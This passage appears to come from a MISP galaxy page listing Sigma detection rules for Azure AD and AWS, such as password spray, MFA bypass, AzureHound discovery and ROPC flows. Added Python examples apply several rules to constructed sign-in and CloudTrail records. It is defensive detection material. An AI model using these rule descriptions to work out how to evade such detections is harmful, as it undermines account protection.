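    # Interactive root sign-in: matches "AWS Root Credentials".
    json.dumps({"eventTime": "2024-01-15T10:02:11Z", "eventSource": "signin.amazonaws.com",
                "eventName": "ConsoleLogin", "eventType": "AwsConsoleSignIn",
                "userIdentity": {"type": "Root", "accountId": "111122223333",
                                 "arn": "arn:aws:iam::111122223333:root"}}),
    # Root principal on an AWS-initiated service event: excluded on purpose.
    json.dumps({"eventTime": "2024-01-15T10:05:00Z", "eventSource": "kms.amazonaws.com",
                "eventName": "RotateKey", "eventType": "AwsServiceEvent",
                "userIdentity": {"type": "Root"}}),
    # Config recorder stopped: matches "AWS Config Disabling Channel/Recorder".
    json.dumps({"eventTime": "2024-01-15T10:07:30Z", "eventSource": "config.amazonaws.com",
                "eventName": "StopConfigurationRecorder", "eventType": "AwsApiCall",
                "userIdentity": {"type": "IAMUser", "userName": "deploy-bot"},
                "requestParameters": {"configurationRecorderName": "default"}}),
    # Versioning suspended: matches "AWS S3 Bucket Versioning Disable".
    json.dumps({"eventTime": "2024-01-15T10:09:45Z", "eventSource": "s3.amazonaws.com",
                "eventName": "PutBucketVersioning", "eventType": "AwsApiCall",
                "userIdentity": {"type": "AssumedRole",
                                 "arn": "arn:aws:sts::111122223333:assumed-role/ops/alice"},
                "requestParameters": {"bucketName": "finance-backups",
                                      "VersioningConfiguration": {"Status": "Suspended"}}}),
    # Versioning re-enabled: benign, must not match.
    json.dumps({"eventTime": "2024-01-15T10:12:00Z", "eventSource": "s3.amazonaws.com",
                "eventName": "PutBucketVersioning", "eventType": "AwsApiCall",
                "userIdentity": {"type": "AssumedRole",
                                 "arn": "arn:aws:sts::111122223333:assumed-role/ops/alice"},
                "requestParameters": {"bucketName": "finance-backups",
                                      "VersioningConfiguration": {"Status": "Enabled"}}}),
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a['level']:6}] {a['eventTime']} {a['rule']} ({a['eventName']}) by {a['actor']}")
```

The versioning predicate checks the parsed Status value rather than the substring 'Suspended' anywhere in requestParameters, so a bucket whose name happens to contain that word does not trip it; the cost is that the example depends on the assumed record shape.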

Too Many Global Admins

Identifies an event where there are too many accounts assigned the Global Administrator role.

Internal MISP references

UUID 7bbc309f-e2b1-4eb1-8369-131a367d67d3 which can be used as unique global reference for Too Many Global Admins in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/14
falsepositive ['Investigate if threshold setting in PIM is too low.']
filename azure_pim_too_many_global_admins.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Roles Are Not Being Used

Identifies when a user has been assigned a privileged role and is not using that role.

Internal MISP references

UUID 8c6ec464-4ae4-43ac-936a-291da66ed13d which can be used as unique global reference for Roles Are Not Being Used in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/14
falsepositive ['Investigate if potential generic account that cannot be removed.']
filename azure_pim_role_not_used.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Roles Activated Too Frequently

Identifies when the same privileged role has multiple activations by the same user.

Internal MISP references

UUID 645fd80d-6c07-435b-9e06-7bc1b5656cba which can be used as unique global reference for Roles Activated Too Frequently in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/14
falsepositive ['Investigate whether the active time period for a role is set too short.']
filename azure_pim_role_frequent_activation.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Invalid PIM License

Identifies when an organization doesn't have the proper license for PIM and is out of compliance.

Internal MISP references

UUID 58af08eb-f9e1-43c8-9805-3ad9b0482bd8 which can be used as unique global reference for Invalid PIM License in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/14
falsepositive ['Investigate if licenses have expired.']
filename azure_pim_invalid_license.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Roles Activation Doesn't Require MFA

Identifies when a privileged role can be activated without performing MFA.

Internal MISP references

UUID 94a66f46-5b64-46ce-80b2-75dcbe627cc0 which can be used as unique global reference for Roles Activation Doesn't Require MFA in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/14
falsepositive ['Investigate if user is performing MFA at sign-in.']
filename azure_pim_role_no_mfa_required.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Roles Assigned Outside PIM

Identifies when a privileged role assignment has taken place outside of PIM, which may indicate an attack.

Internal MISP references

UUID b1bc08d1-8224-4758-a0e6-fbcfc98c73bb which can be used as unique global reference for Roles Assigned Outside PIM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/14
falsepositive ['Investigate where users are being assigned privileged roles outside of Privileged Identity Management and prohibit future assignments from there.']
filename azure_pim_role_assigned_outside_of_pim.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Stale Accounts In A Privileged Role

Identifies when an account hasn't signed in during the past n number of days.

Internal MISP references

UUID e402c26a-267a-45bd-9615-bd9ceda6da85 which can be used as unique global reference for Stale Accounts In A Privileged Role in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/14
falsepositive ['Investigate if potential generic account that cannot be removed.']
filename azure_pim_account_stale.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Use of Legacy Authentication Protocols

Alerts when legacy authentication has been used on an account.

Internal MISP references

UUID 60f6535a-760f-42a9-be3f-c9a0a025906e which can be used as unique global reference for Use of Legacy Authentication Protocols in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Yochana Henderson, '@Yochana-H'
creation_date 2022/06/17
falsepositive ['User has been put in an exception group so they can use legacy authentication']
filename azure_legacy_authentication_protocols.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1078.004', 'attack.t1110']
Related clusters

To see the related clusters, click here.

Sign-in Failure Due to Conditional Access Requirements Not Met

Define a baseline threshold for failed sign-ins due to Conditional Access failures

Internal MISP references

UUID b4a6d707-9430-4f5f-af68-0337f52d5c42 which can be used as unique global reference for Sign-in Failure Due to Conditional Access Requirements Not Met in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Yochana Henderson, '@Yochana-H'
creation_date 2022/06/01
falsepositive ['Service Account misconfigured', 'Misconfigured Systems', 'Vulnerability Scanners']
filename azure_conditional_access_failure.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1110', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Applications That Are Using ROPC Authentication Flow

Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider.

Internal MISP references

UUID 55695bc0-c8cf-461f-a379-2535f563c854 which can be used as unique global reference for Applications That Are Using ROPC Authentication Flow in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
creation_date 2022/06/01
falsepositive ['Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow']
filename azure_app_ropc_authentication.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

User Access Blocked by Azure Conditional Access

Detects when access has been blocked by Conditional Access policies. The access policy did not allow token issuance, which might be a sign of unauthorized login attempts against valid accounts.

Internal MISP references

UUID 9a60e676-26ac-44c3-814b-0c2a8b977adf which can be used as unique global reference for User Access Blocked by Azure Conditional Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author AlertIQ
creation_date 2021/10/10
falsepositive ['Unknown']
filename azure_user_login_blocked_by_conditional_access.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.credential_access', 'attack.initial_access', 'attack.t1110', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Increased Failed Authentications Of Any Type

Detects when failed sign-ins increased by 10% or greater.

Internal MISP references

UUID e1d02b53-c03c-4948-b11d-4d00cca49d03 which can be used as unique global reference for Increased Failed Authentications Of Any Type in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'
creation_date 2022/08/11
falsepositive ['Unlikely']
filename azure_ad_auth_failure_increase.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Users Authenticating To Other Azure AD Tenants

Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.

Internal MISP references

UUID 5f521e4b-0105-4b72-845b-2198a54487b9 which can be used as unique global reference for Users Authenticating To Other Azure AD Tenants in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author MikeDuddington, '@dudders1'
creation_date 2022/06/30
falsepositive ['If this was approved by System Administrator.']
filename azure_users_authenticating_to_other_azure_ad_tenants.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Authentications To Important Apps Using Single Factor Authentication

Detects when authentications to important application(s) required only single-factor authentication.

Internal MISP references

UUID f272fb46-25f2-422c-b667-45837994980f which can be used as unique global reference for Authentications To Important Apps Using Single Factor Authentication in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author MikeDuddington, '@dudders1'
creation_date 2022/07/28
falsepositive ['If this was approved by System Administrator.']
filename azure_ad_auth_to_important_apps_using_single_factor_auth.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Measurable Increase Of Successful Authentications

Detects when successful sign-ins increased by 10% or greater.

Internal MISP references

UUID 67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae which can be used as unique global reference for Measurable Increase Of Successful Authentications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton
creation_date 2022/08/11
falsepositive ['Increase of users in the environment']
filename azure_ad_auth_sucess_increase.yml
level low
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1078']
Related clusters

To see the related clusters, click here.
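The two rate-based rules above (failed authentications and successful authentications each increasing by 10% or more) differ from the other entries in that they aggregate over a time window instead of matching a single record. As an added example, not the Sigma project's or the MISP galaxy's code, the block below applies that logic to constructed Entra ID sign-in records. Only two sign-in log fields are used, createdDateTime and status.errorCode (0 is a successful sign-in; 50126 is the invalid username or password error). Comparing each one-hour window against the previous one is this example's choice of baseline; the rules themselves leave the window to the deployment. It also handles the window with no prior failures, where a percentage increase is undefined.

```python
"""Added example: the "increased by 10 % or greater" logic over constructed
Entra ID sign-in records. Fields used: createdDateTime, status.errorCode.
The hour-over-hour baseline is this example's choice, not the rules'."""
from collections import Counter
from datetime import datetime, timezone


def hour_window(created: str) -> str:
    """Bucket an ISO 8601 timestamp into its UTC hour, e.g. '2024-01-15T09'."""
    ts = datetime.fromisoformat(created.replace("Z", "+00:00"))
    return ts.astimezone(timezone.utc).strftime("%Y-%m-%dT%H")


def count_by_window(signins):
    """Return (failed, succeeded) Counters keyed by hour window."""
    failed, succeeded = Counter(), Counter()
    for s in signins:
        window = hour_window(s["createdDateTime"])
        if s["status"]["errorCode"] == 0:
            succeeded[window] += 1
        else:
            failed[window] += 1
    return failed, succeeded


def pct_increase(previous: int, current: int):
    """Percentage change from previous to current; None when there is no baseline."""
    if previous == 0:
        return None
    return (current - previous) / previous * 100.0


def evaluate(signins, threshold_pct: float = 10.0):
    """One alert per window whose count rose by at least threshold_pct over the previous window."""
    failed, succeeded = count_by_window(signins)
    windows = sorted(set(failed) | set(succeeded))
    series = (
        ("Increased Failed Authentications Of Any Type", "medium", failed),
        ("Measurable Increase Of Successful Authentications", "low", succeeded),
    )
    alerts = []
    for rule, level, counts in series:
        for prev_w, cur_w in zip(windows, windows[1:]):
            change = pct_increase(counts[prev_w], counts[cur_w])
            if change is not None and change >= threshold_pct:
                alerts.append({"rule": rule, "level": level, "window": cur_w,
                               "previous": counts[prev_w], "current": counts[cur_w],
                               "increase_pct": round(change, 1)})
    return alerts


def make_signins(window: str, failed: int, succeeded: int):
    """Construct sign-in records for one hour window (sample data, not real logs)."""
    records = []
    for i in range(failed + succeeded):
        records.append({
            "createdDateTime": f"{window}:{i % 60:02d}:{(i // 60) % 60:02d}Z",
            "userPrincipalName": f"user{i}@example.com",
            # 50126: invalid username or password
            "status": {"errorCode": 50126 if i < failed else 0},
        })
    return records


# Constructed four-hour sample: no failures at all in the first hour,
# a 20 % jump in failures at 10:00, and success growth of 11.1 % and 15.4 %.
SAMPLE_SIGNINS = (
    make_signins("2024-01-15T08", failed=0, succeeded=90)
    + make_signins("2024-01-15T09", failed=20, succeeded=100)
    + make_signins("2024-01-15T10", failed=24, succeeded=104)
    + make_signins("2024-01-15T11", failed=24, succeeded=120)
)

if __name__ == "__main__":
    for a in evaluate(SAMPLE_SIGNINS):
        print(f"[{a['level']:6}] {a['window']} {a['rule']}: "
              f"{a['previous']} -> {a['current']} (+{a['increase_pct']}%)")
```

On the sample, the 08:00 to 09:00 jump in failures (0 to 20) produces no alert because there is no baseline to compute a percentage from; a deployment would want a separate absolute-count check for that case, which the success series shows is otherwise easy to miss behind the percentage figure.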

Successful Authentications From Countries You Do Not Operate Out Of

Detect successful authentications from countries you do not operate out of.

Internal MISP references

UUID 8c944ecb-6970-4541-8496-be554b8e2846 which can be used as unique global reference for Successful Authentications From Countries You Do Not Operate Out Of in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author MikeDuddington, '@dudders1'
creation_date 2022/07/28
falsepositive ['If this was approved by System Administrator.']
filename azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1078.004', 'attack.t1110']
Related clusters

To see the related clusters, click here.

Potential MFA Bypass Using Legacy Client Authentication

Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack.

Internal MISP references

UUID 53bb4f7f-48a8-4475-ac30-5a82ddfdf6fc which can be used as unique global reference for Potential MFA Bypass Using Legacy Client Authentication in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Harjot Singh, '@cyb3rjy0t'
creation_date 2023/03/20
falsepositive ['Known Legacy Accounts']
filename azure_ad_suspicious_signin_bypassing_mfa.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1078.004', 'attack.t1110']
Related clusters

To see the related clusters, click here.

Device Registration or Join Without MFA

Monitor and alert for device registration or join events where MFA was not performed.

Internal MISP references

UUID 5afa454e-030c-4ab4-9253-a90aa7fcc581 which can be used as unique global reference for Device Registration or Join Without MFA in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Epping, '@mepples21'
creation_date 2022/06/28
falsepositive ['Unknown']
filename azure_ad_device_registration_or_join_without_mfa.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Discovery Using AzureHound

Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.

Internal MISP references

UUID 35b781cc-1a08-4a5a-80af-42fd7c315c6b which can be used as unique global reference for Discovery Using AzureHound in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe
creation_date 2022/11/27
falsepositive ['Unknown']
filename azure_ad_azurehound_discovery.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.discovery', 'attack.t1087.004', 'attack.t1526']
Related clusters

To see the related clusters, click here.

Account Lockout

Identifies a user account that has been locked because the user tried to sign in too many times with an incorrect user ID or password.

Internal MISP references

UUID 2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a which can be used as unique global reference for Account Lockout in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author AlertIQ
creation_date 2021/10/10
falsepositive ['Unknown']
filename azure_account_lockout.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.credential_access', 'attack.t1110']
Related clusters

To see the related clusters, click here.

Sign-ins by Unknown Devices

Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.

Internal MISP references

UUID 4d136857-6a1a-432a-82fc-5dd497ee5e7c which can be used as unique global reference for Sign-ins by Unknown Devices in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Epping, '@mepples21'
creation_date 2022/06/28
falsepositive ['Unknown']
filename azure_ad_sign_ins_from_unknown_devices.yml
level low
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Multifactor Authentication Interrupted

Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.

Internal MISP references

UUID 5496ff55-42ec-4369-81cb-00f417029e25 which can be used as unique global reference for Multifactor Authentication Interrupted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author AlertIQ
creation_date 2021/10/10
falsepositive ['Unknown']
filename azure_mfa_interrupted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1078.004', 'attack.t1110', 'attack.t1621']
Related clusters

To see the related clusters, click here.

Multifactor Authentication Denied

The user has indicated they did not initiate the MFA prompt, which could indicate an attacker has the password for the account.

Internal MISP references

UUID e40f4962-b02b-4192-9bfe-245f7ece1f99 which can be used as unique global reference for Multifactor Authentication Denied in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author AlertIQ
creation_date 2022/03/24
falsepositive ['Users actually logging in but mis-clicking the Deny button on the MFA prompt.']
filename azure_mfa_denies.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1078.004', 'attack.t1110', 'attack.t1621']
Related clusters

To see the related clusters, click here.

Failed Authentications From Countries You Do Not Operate Out Of

Detect failed authentications from countries you do not operate out of.

Internal MISP references

UUID 28870ae4-6a13-4616-bd1a-235a7fad7458 which can be used as unique global reference for Failed Authentications From Countries You Do Not Operate Out Of in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author MikeDuddington, '@dudders1'
creation_date 2022/07/28
falsepositive ['If this was approved by System Administrator.']
filename azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml
level low
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1078.004', 'attack.t1110']
Related clusters

To see the related clusters, click here.

Login to Disabled Account

Detect failed attempts to sign in to disabled accounts.

Internal MISP references

UUID 908655e0-25cf-4ae1-b775-1c8ce9cf43d8 which can be used as unique global reference for Login to Disabled Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author AlertIQ
creation_date 2021/10/10
falsepositive ['Unknown']
filename azure_login_to_disabled_account.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Suspicious SignIns From A Non Registered Device

Detects risky authentication from a device not registered in Azure AD, without MFA being required.

Internal MISP references

UUID 572b12d4-9062-11ed-a1eb-0242ac120002 which can be used as unique global reference for Suspicious SignIns From A Non Registered Device in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Harjot Singh, '@cyb3rjy0t'
creation_date 2023/01/10
falsepositive ['Unknown']
filename azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Azure AD Only Single Factor Authentication Required

Detect when users are authenticating without MFA being required.

Internal MISP references

UUID 28eea407-28d7-4e42-b0be-575d5ba60b2c which can be used as unique global reference for Azure AD Only Single Factor Authentication Required in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author MikeDuddington, '@dudders1'
creation_date 2022/07/27
falsepositive ['If this was approved by System Administrator.']
filename azure_ad_only_single_factor_auth_required.yml
level low
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1078.004', 'attack.t1556.006']
Related clusters

To see the related clusters, click here.

Sign-ins from Non-Compliant Devices

Monitor and alert for sign-ins where the device was non-compliant.

Internal MISP references

UUID 4f77e1d7-3982-4ee0-8489-abf2d6b75284 which can be used as unique global reference for Sign-ins from Non-Compliant Devices in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Epping, '@mepples21'
creation_date 2022/06/28
falsepositive ['Unknown']
filename azure_ad_sign_ins_from_noncompliant_devices.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Azure Unusual Authentication Interruption

Detects when there is an interruption in the authentication process.

Internal MISP references

UUID 8366030e-7216-476b-9927-271d79f13cf3 which can be used as unique global reference for Azure Unusual Authentication Interruption in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/11/26
falsepositive ['Unknown']
filename azure_unusual_authentication_interruption.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Application Using Device Code Authentication Flow

Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious.

Internal MISP references

UUID 248649b7-d64f-46f0-9fb2-a52774166fb5 which can be used as unique global reference for Application Using Device Code Authentication Flow in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
creation_date 2022/06/01
falsepositive ['Applications that are input constrained will need to use device code flow and are valid authentications.']
filename azure_app_device_code_authentication.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.initial_access']
Related clusters

To see the related clusters, click here.
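The ROPC entry earlier on this page and the device code entry just above both hinge on which OAuth 2.0 flow a sign-in used, and both list legitimate users of the flow (input-constrained devices, automated testing, legacy applications) as the expected false positives. The block below is an added example, not code from the Sigma project or the MISP galaxy: it flags Entra ID sign-ins whose authenticationProtocol is ropc or deviceCode, suppresses (appId, flow) pairs an operator has explicitly accepted, and records whether the Conditional Access policy demanded MFA and whether the sign-in succeeded, since a failed ROPC attempt is still evidence that a client is handling passwords directly. The sign-in log fields used (appId, appDisplayName, userPrincipalName, authenticationProtocol, authenticationRequirement, status.errorCode) follow the Entra sign-in schema; the allow-list, application IDs and records are constructed for the example.

```python
"""Added example: flag Entra ID sign-ins using the ROPC or device-code flow,
with an operator allow-list for accepted (appId, flow) pairs. All application
IDs, the allow-list and the sign-in records are constructed for this example."""

# Hypothetical allow-list: (appId, flow) -> reason it is accepted.
ACCEPTED_FLOWS = {
    ("00000000-0000-0000-0000-00000000a001", "deviceCode"): "lobby display, input constrained",
}

# authenticationProtocol value -> (rule title from this page, level from its metadata)
FLOW_RULES = {
    "ropc": ("Applications That Are Using ROPC Authentication Flow", "medium"),
    "deviceCode": ("Application Using Device Code Authentication Flow", "medium"),
}


def classify(signin: dict):
    """Return an alert dict for a ROPC or device-code sign-in, or None."""
    proto = signin.get("authenticationProtocol")
    if proto not in FLOW_RULES:
        return None
    if (signin.get("appId"), proto) in ACCEPTED_FLOWS:
        return None
    rule, level = FLOW_RULES[proto]
    return {
        "rule": rule,
        "level": level,
        "flow": proto,
        "app": signin.get("appDisplayName"),
        "appId": signin.get("appId"),
        "user": signin.get("userPrincipalName"),
        # A failed ROPC attempt still shows a client that handles raw passwords.
        "succeeded": signin.get("status", {}).get("errorCode") == 0,
        # What the policy demanded; ROPC cannot complete an interactive MFA challenge.
        "mfa_required": signin.get("authenticationRequirement") == "multiFactorAuthentication",
    }


def scan_flows(signins):
    """Run classify() over a batch of sign-in records and keep the hits."""
    return [a for a in (classify(s) for s in signins) if a is not None]


# Constructed sign-in records (not real logs).
SAMPLE_SIGNINS = [
    # Service account authenticating with ROPC, single factor, success.
    {"createdDateTime": "2024-01-15T09:01:00Z", "userPrincipalName": "svc-sync@example.com",
     "appId": "11111111-2222-3333-4444-555555555555", "appDisplayName": "legacy-mail-sync",
     "authenticationProtocol": "ropc", "authenticationRequirement": "singleFactorAuthentication",
     "status": {"errorCode": 0}},
    # Human user, wrong password (50126) through the same ROPC client.
    {"createdDateTime": "2024-01-15T09:02:30Z", "userPrincipalName": "alice@example.com",
     "appId": "11111111-2222-3333-4444-555555555555", "appDisplayName": "legacy-mail-sync",
     "authenticationProtocol": "ropc", "authenticationRequirement": "singleFactorAuthentication",
     "status": {"errorCode": 50126}},
    # Allow-listed input-constrained device using device code: suppressed.
    {"createdDateTime": "2024-01-15T09:05:00Z", "userPrincipalName": "lobby@example.com",
     "appId": "00000000-0000-0000-0000-00000000a001", "appDisplayName": "lobby-display",
     "authenticationProtocol": "deviceCode", "authenticationRequirement": "singleFactorAuthentication",
     "status": {"errorCode": 0}},
    # Unrecognised client using device code, MFA satisfied: still worth a look.
    {"createdDateTime": "2024-01-15T09:07:00Z", "userPrincipalName": "bob@example.com",
     "appId": "22222222-3333-4444-5555-666666666666", "appDisplayName": "unknown-cli",
     "authenticationProtocol": "deviceCode", "authenticationRequirement": "multiFactorAuthentication",
     "status": {"errorCode": 0}},
    # Ordinary browser sign-in via the authorization-code flow: ignored.
    {"createdDateTime": "2024-01-15T09:08:00Z", "userPrincipalName": "carol@example.com",
     "appId": "33333333-4444-5555-6666-777777777777", "appDisplayName": "web-portal",
     "authenticationProtocol": "oAuth2", "authenticationRequirement": "multiFactorAuthentication",
     "status": {"errorCode": 0}},
]

if __name__ == "__main__":
    for a in scan_flows(SAMPLE_SIGNINS):
        outcome = "ok" if a["succeeded"] else "failed"
        mfa = "mfa" if a["mfa_required"] else "single-factor"
        print(f"[{a['level']:6}] {a['flow']:10} {a['app']} / {a['user']} ({outcome}, {mfa})")
```

Keying the allow-list on the (appId, flow) pair rather than on appDisplayName matters: display names are attacker-controllable in app registrations, while the appId is what the token was actually issued for.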

Account Disabled or Blocked for Sign in Attempts

Detects sign-in attempts by an account that is disabled or blocked for sign-in.

Internal MISP references

UUID 4afac85c-224a-4dd7-b1af-8da40e1c60bd which can be used as unique global reference for Account Disabled or Blocked for Sign in Attempts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Yochana Henderson, '@Yochana-H'
creation_date 2022/06/17
falsepositive ['Account disabled or blocked in error', 'Automation account has been blocked or disabled']
filename azure_blocked_account_attempt.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Password Spray Activity

Indicates that a password spray attack has been successfully performed.

Internal MISP references

UUID 28ecba0a-c743-4690-ad29-9a8f6f25a6f9 which can be used as unique global reference for Password Spray Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_password_spray.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1110', 'attack.credential_access']
Related clusters

To see the related clusters, click here.

Suspicious Inbox Manipulation Rules

Detects when suspicious rules that delete or move messages or folders are set on a user's inbox.

Internal MISP references

UUID ceb55fd0-726e-4656-bf4e-b585b7f7d572 which can be used as unique global reference for Suspicious Inbox Manipulation Rules in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['Actual mailbox rules that are moving items based on their workflow.']
filename azure_identity_protection_inbox_manipulation.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1140', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Anonymous IP Address

Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.

Internal MISP references

UUID 53acd925-2003-440d-a1f3-71a5253fe237 which can be used as unique global reference for Anonymous IP Address in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Gloria Lee, '@gleeiamglo'
creation_date 2023/08/22
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins']
filename azure_identity_protection_anonymous_ip_address.yml
level high
